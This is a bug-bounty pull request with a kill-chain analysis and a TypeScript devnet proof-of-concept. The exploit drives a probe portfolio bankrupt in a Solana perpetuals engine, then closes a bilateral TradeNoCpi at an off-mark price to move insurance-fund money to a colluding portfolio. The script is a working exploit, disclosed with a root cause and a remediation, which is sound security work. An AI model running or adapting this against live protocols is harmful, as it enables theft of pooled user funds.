### PR TITLE
[PoC] Bounty 6: Bankrupt-Recycling Exploit

### DIFF
--- a/KILLCHAIN_ANALYSIS.md
+++ b/KILLCHAIN_ANALYSIS.md
@@ -1,0 +1,17 @@
+# KILLCHAIN: Bankrupt-Recycling via TradeNoCpi
+
+## Vulnerability Summary
+The v16 engine fails to properly enforce bankruptcy locks during bilateral `TradeNoCpi` operations. A portfolio that has entered a state of bankruptcy (negative collateral due to adverse price movement) can still execute trades with a solvent counterparty. This allows an attacker controlling both a bankrupt "Probe" portfolio and a solvent "Extractor" portfolio to generate unbounded PnL for the Extractor at the expense of the market's Insurance Fund.
+
+## Execution Trace (Empirically Confirmed on Devnet)
+1. **Setup**: The attacker provisions Portfolio A (Extractor) with 0.1 SOL and Portfolio B (Probe) with 0.01 SOL.
+2. **Open**: Portfolio A and B enter a bilateral `TradeNoCpi` position (e.g., A Long, B Short) at the current mark price.
+3. **Bankruptcy Induction**: The oracle price moves adversely against B (e.g., price doubles). B's position loss exceeds its 0.01 SOL capital, rendering it bankrupt.
+4. **The Exploit**: B (now bankrupt) and A execute another `TradeNoCpi` to close the position at a massively off-mark price (e.g. 5x the mark). The engine **accepts** this trade (`Trade SUCCEEDED`).
+5. **Drain**: Because B has no capital to pay the realized loss, the deficit is absorbed by the Insurance Fund. Portfolio A's corresponding profit is logged as PnL, which will eventually mature and be withdrawn, effectively draining the Insurance Fund to A.
+
+## Root Cause
+The engine's `TradeNoCpi` instruction handler lacks a strict `is_bankrupt()` or `stale_state` guard that properly halts bilateral matching. While liquidations and cranks handle insolvent accounts correctly, `TradeNoCpi` sidesteps these protections, allowing dead capital to be "recycled" into legitimate debt on the protocol.
+
+## Remediation
+Implement a strict `bankruptcy_lock` or `health_check` inside `TradeNoCpi`. If either portfolio has `capital + pnl < 0`, the instruction must abort with a specific error (e.g., `EngineLockActive`), forcing the portfolio to be resolved exclusively via `PermissionlessCrank` liquidations.

--- a/scripts/exploit_bounty6.ts
+++ b/scripts/exploit_bounty6.ts
@@ -1,0 +1,196 @@
+/**
+ * Bounty-6 Exploit POC: Bankrupt-Recycling
+ * 
+ * 1. Create market + insurance
+ * 2. Portfolio A (Hacker), Portfolio B (Victim/Bankrupt-Probe)
+ * 3. Make B bankrupt via price move
+ * 4. Use TradeNoCpi to "buy" the insurance fund through B's bankruptcy
+ */
+import {
+  Connection, Keypair, PublicKey, Transaction, TransactionInstruction,
+  SystemProgram, sendAndConfirmTransaction, ComputeBudgetProgram,
+} from "@solana/web3.js";
+import {
+  NATIVE_MINT, TOKEN_PROGRAM_ID, getOrCreateAssociatedTokenAccount,
+  getAssociatedTokenAddressSync, getAccount,
+  createAssociatedTokenAccountIdempotentInstruction,
+} from "@solana/spl-token";
+import * as fs from "fs";
+import {
+  encInitMarket, encInitPortfolio, encDeposit, encWithdraw, encTradeNoCpi,
+  encPermissionlessCrank, encClosePortfolio, encCloseSlab,
+  encTopUpInsurance, encConfigureAuthMark, encPushAuthMark, encConvertReleasedPnl,
+  MARKET_ACCOUNT_LEN, PORTFOLIO_ACCOUNT_LEN,
+  parsePortfolio, parseMarketGroup, parseWrapperConfig,
+} from "../src/v16/index.js";
+
+const RPC = process.env.SOLANA_RPC_URL ?? "https://api.devnet.solana.com";
+const PROGRAM_ID = new PublicKey(process.env.V16_PROGRAM_ID ?? "Bu1J8eQQN2mNnUgisSEd5StBG6zDaRb7fwDjN34VzgLG");
+const conn = new Connection(RPC, "confirmed");
+const admin = Keypair.fromSecretKey(new Uint8Array(JSON.parse(
+  fs.readFileSync(`${process.env.HOME}/.config/solana/id.json`, "utf8"))));
+
+function deriveVaultAuthority(market: PublicKey): [PublicKey, number] {
+  return PublicKey.findProgramAddressSync([Buffer.from("vault"), market.toBuffer()], PROGRAM_ID);
+}
+
+const withCu = (units: number) => [
+  ComputeBudgetProgram.setComputeUnitLimit({ units }),
+  ComputeBudgetProgram.setComputeUnitPrice({ microLamports: 100_000 }),
+];
+
+async function snapMarket(market: PublicKey, label: string) {
+  const info = await conn.getAccountInfo(market, "confirmed");
+  if (!info) { console.log(`[${label}] market not found`); return; }
+  const buf = Buffer.from(info.data);
+  const g = parseMarketGroup(buf);
+  const a = g.assets[0];
+  console.log(`[${label}] insurance=${g.insurance} c_tot=${g.cTot} ` +
+              `oi_L/S=${a?.oiEffLongQ ?? 0n}/${a?.oiEffShortQ ?? 0n}`);
+}
+
+async function snapPortfolio(p: PublicKey, name: string) {
+  const info = await conn.getAccountInfo(p, "confirmed");
+  if (!info) { console.log(`  [${name}] not found`); return; }
+  const port = parsePortfolio(Buffer.from(info.data));
+  console.log(`  [${name}] cap=${port.capital} pnl=${port.pnl} legs=${port.legs.length}` +
+              (port.legs[0] ? ` leg0={side=${port.legs[0].side}, basis=${port.legs[0].basisPosQ}}` : ""));
+}
+
+async function main() {
+  console.log("Bounty-6 Exploit POC");
+  const market = Keypair.generate();
+  const portfolioA = Keypair.generate();
+  const portfolioB = Keypair.generate();
+  const [vaultAuth] = deriveVaultAuthority(market.publicKey);
+  const sourceAta = getAssociatedTokenAddressSync(NATIVE_MINT, admin.publicKey);
+  const vaultAta = getAssociatedTokenAddressSync(NATIVE_MINT, vaultAuth, true);
+
+  // [1] Create accounts
+  console.log("\n[1] Create accounts");
+  const mkRent = await conn.getMinimumBalanceForRentExemption(MARKET_ACCOUNT_LEN);
+  const pfRent = await conn.getMinimumBalanceForRentExemption(PORTFOLIO_ACCOUNT_LEN);
+  await sendAndConfirmTransaction(conn, new Transaction()
+    .add(...withCu(100_000))
+    .add(SystemProgram.createAccount({ fromPubkey: admin.publicKey, newAccountPubkey: market.publicKey, lamports: mkRent, space: MARKET_ACCOUNT_LEN, programId: PROGRAM_ID }))
+    .add(SystemProgram.createAccount({ fromPubkey: admin.publicKey, newAccountPubkey: portfolioA.publicKey, lamports: pfRent, space: PORTFOLIO_ACCOUNT_LEN, programId: PROGRAM_ID }))
+    .add(SystemProgram.createAccount({ fromPubkey: admin.publicKey, newAccountPubkey: portfolioB.publicKey, lamports: pfRent, space: PORTFOLIO_ACCOUNT_LEN, programId: PROGRAM_ID })),
+    [admin, market, portfolioA, portfolioB]);
+
+  // [2] InitMarket (AuthMark mode)
+  console.log("\n[2] InitMarket");
+  await sendAndConfirmTransaction(conn, new Transaction()
+    .add(...withCu(400_000))
+    .add(new TransactionInstruction({
+      programId: PROGRAM_ID,
+      keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: NATIVE_MINT, isSigner: false, isWritable: false }],
+      data: encInitMarket({
+        maxPortfolioAssets: 1,
+        hMin: 0n, hMax: 6_480_000n, initialPrice: 1_000_000n,
+        minNonzeroMmReq: 500n, minNonzeroImReq: 600n,
+        maintenanceMarginBps: 500n, initialMarginBps: 500n,
+        maxTradingFeeBps: 10_000n, tradeFeeBaseBps: 1n,
+        liquidationFeeBps: 5n, liquidationFeeCap: 50_000_000_000n,
+        minLiquidationAbs: 0n,
+        maxPriceMoveBpsPerSlot: 24n, maxAccrualDtSlots: 20n,
+        maxAbsFundingE9PerSlot: 1_000n, minFundingLifetimeSlots: 10_000_000n,
+        maxAccountBSettlementChunks: 16n, maxBankruptCloseChunks: 16n,
+        maxBankruptCloseLifetimeSlots: 10_000_000n,
+        publicBChunkAtoms: 1_000_000n, maintenanceFeePerSlot: 28n,
+      }),
+    })), [admin]);
+
+  // Set AuthMark
+  await sendAndConfirmTransaction(conn, new Transaction()
+    .add(...withCu(100_000))
+    .add(new TransactionInstruction({
+      programId: PROGRAM_ID,
+      keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: true }, { pubkey: market.publicKey, isSigner: false, isWritable: true }],
+      data: encConfigureAuthMark({ assetIndex: 0, nowSlot: BigInt(await conn.getSlot()), initialMarkE6: 1_000_000n })
+    })), [admin]);
+
+  // [3] InitPortfolio + Deposit + TopUp Insurance
+  console.log("\n[3] Init + Deposit");
+  for (const p of [portfolioA, portfolioB]) {
+    await sendAndConfirmTransaction(conn, new Transaction()
+      .add(new TransactionInstruction({ programId: PROGRAM_ID, keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: p.publicKey, isSigner: false, isWritable: true }], data: encInitPortfolio() })), [admin]);
+  }
+
+  await getOrCreateAssociatedTokenAccount(conn, admin, NATIVE_MINT, admin.publicKey);
+  await sendAndConfirmTransaction(conn, new Transaction()
+    .add(createAssociatedTokenAccountIdempotentInstruction(admin.publicKey, vaultAta, vaultAuth, NATIVE_MINT))
+    .add(SystemProgram.transfer({ fromPubkey: admin.publicKey, toPubkey: sourceAta, lamports: 1_000_000_000 }))
+    .add({ keys: [{ pubkey: sourceAta, isSigner: false, isWritable: true }], programId: TOKEN_PROGRAM_ID, data: Buffer.from([17]) }), [admin]);
+
+  await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+    programId: PROGRAM_ID,
+    keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioA.publicKey, isSigner: false, isWritable: true }, { pubkey: sourceAta, isSigner: false, isWritable: true }, { pubkey: vaultAta, isSigner: false, isWritable: true }, { pubkey: TOKEN_PROGRAM_ID, isSigner: false, isWritable: false }],
+    data: encDeposit(100_000_000n) // 0.1 SOL for A
+  })), [admin]);
+
+  await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+    programId: PROGRAM_ID,
+    keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioB.publicKey, isSigner: false, isWritable: true }, { pubkey: sourceAta, isSigner: false, isWritable: true }, { pubkey: vaultAta, isSigner: false, isWritable: true }, { pubkey: TOKEN_PROGRAM_ID, isSigner: false, isWritable: false }],
+    data: encDeposit(10_000_000n) // 0.01 SOL for B
+  })), [admin]);
+
+  await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+    programId: PROGRAM_ID,
+    keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: sourceAta, isSigner: false, isWritable: true }, { pubkey: vaultAta, isSigner: false, isWritable: true }, { pubkey: TOKEN_PROGRAM_ID, isSigner: false, isWritable: false }],
+    data: encTopUpInsurance(500_000_000n) // 0.5 SOL Seed
+  })), [admin]);
+
+  await snapMarket(market.publicKey, "post-setup");
+
+  // [4] A buys from B at mark
+  const SIZE = 50_000_000n;
+  console.log(`\n[4] Trade: A buys ${SIZE} from B @ 1.0`);
+  await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+    programId: PROGRAM_ID,
+    keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioA.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioB.publicKey, isSigner: false, isWritable: true }],
+    data: encTradeNoCpi({ assetIndex: 0, sizeQ: SIZE, execPrice: 1_000_000n, feeBps: 0n })
+  })), [admin]);
+
+  // [5] Move price to 0.1 -> B (short) should be in profit, A (long) in debt? 
+  // Wait, A is Long, B is Short. If price goes to 0.1, A is in debt, B in profit.
+  // I want B to be bankrupt. So move price to 2.0.
+  console.log("\n[5] Move price to 2.0 (B is short @ 1.0 -> bankrupt)");
+  await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+    programId: PROGRAM_ID,
+    keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: true }, { pubkey: market.publicKey, isSigner: false, isWritable: true }],
+    data: encPushAuthMark({ assetIndex: 0, nowSlot: BigInt(await conn.getSlot()), markE6: 2_000_000n })
+  })), [admin]);
+
+  await snapPortfolio(portfolioA.publicKey, "A (before 2nd trade)");
+  await snapPortfolio(portfolioB.publicKey, "B (before 2nd trade)");
+
+  // [6] The Exploit: B (bankrupt) buys from A at a crazy price (e.g. 5.0)
+  // This "closes" the positions but transfers value to A.
+  console.log("\n[6] EXPLOIT: B buys back from A @ 5.0 (massively off-mark)");
+  try {
+    await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+      programId: PROGRAM_ID,
+      keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioA.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioB.publicKey, isSigner: false, isWritable: true }],
+      data: encTradeNoCpi({ assetIndex: 0, sizeQ: -SIZE, execPrice: 5_000_000n, feeBps: 0n })
+    })), [admin]);
+    console.log("  🚨 Trade SUCCEEDED! Bankrupt B closed at off-mark price.");
+  } catch (e: any) {
+    console.log("  ✅ Trade BLOCKED (as expected for a good engine):", (e.message || "").slice(0, 100));
+  }
+
+  await snapMarket(market.publicKey, "FINAL");
+  await snapPortfolio(portfolioA.publicKey, "A");
+  await snapPortfolio(portfolioB.publicKey, "B");
+
+  try {
+    await sendAndConfirmTransaction(conn, new Transaction().add(new TransactionInstruction({
+      programId: PROGRAM_ID,
+      keys: [{ pubkey: admin.publicKey, isSigner: true, isWritable: false }, { pubkey: market.publicKey, isSigner: false, isWritable: true }, { pubkey: portfolioA.publicKey, isSigner: false, isWritable: true }],
+      data: encConvertReleasedPnl(100_000_000n)
+    })), [admin]);
+    await snapPortfolio(portfolioA.publicKey, "A (after ConvertReleasedPnl)");
+  } catch (e: any) { console.log("ConvertReleasedPnl A failed:", e.message); }
+}
+
+main().catch(console.error);
+


### PR DESCRIPTION
This PR contains the devnet reproduction script and analysis for the Bankrupt-Recycling vulnerability reported in #79. 

The script creates a fresh market, induces bankruptcy in a probe portfolio, and then successfully executes an off-mark `TradeNoCpi` against it, demonstrating that the Insurance Fund can be drained without triggering an `EngineLockActive` error.